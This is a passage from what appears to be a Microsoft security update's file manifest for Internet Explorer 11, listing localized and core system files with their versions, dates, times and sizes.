5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 18-May-2021| 1:26| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 18-May-2021| 1:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20038| 17-May-2021| 21:55| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 18-May-2021| 1:24| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20038| 17-May-2021| 22:22| 615,936 \niedkcs32.dll| 18.0.9600.20038| 17-May-2021| 21:53| 381,952 \ninstall.ins| Not versioned| 17-May-2021| 20:02| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20038| 17-May-2021| 21:22| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20038| 18-May-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20038| 18-May-2021| 1:24| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20038| 17-May-2021| 21:58| 1,422,848 \nmsfeeds.dll| 11.0.9600.20038| 17-May-2021| 21:52| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20038| 17-May-2021| 22:03| 92,672 \nmshtml.dll| 11.0.9600.20038| 18-May-2021| 0:16| 25,759,744 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20038| 17-May-2021| 21:21| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 18-May-2021| 0:42| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20038| 17-May-2021| 21:53| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20038| 17-May-2021| 22:38| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20038| 18-May-2021| 1:30| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20038| 17-May-2021| 22:08| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20038| 17-May-2021| 21:59| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20038| 17-May-2021| 22:52| 5,500,928 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20038| 17-May-2021| 22:21| 785,408 \nvbscript.dll| 5.8.9600.20038| 17-May-2021| 22:31| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20038| 17-May-2021| 21:50| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20038| 17-May-2021| 22:47| 20,294,656 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20038| 17-May-2021| 21:55| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20038| 17-May-2021| 22:02| 4,112,896 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20038| 17-May-2021| 22:11| 653,824 \nvbscript.dll| 5.8.9600.20038| 17-May-2021| 22:20| 498,176 \nactxprxy.dll| 6.3.9600.20038| 17-May-2021| 21:41| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20038| 17-May-2021| 21:35| 1,341,952 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20038| 17-May-2021| 21:50| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 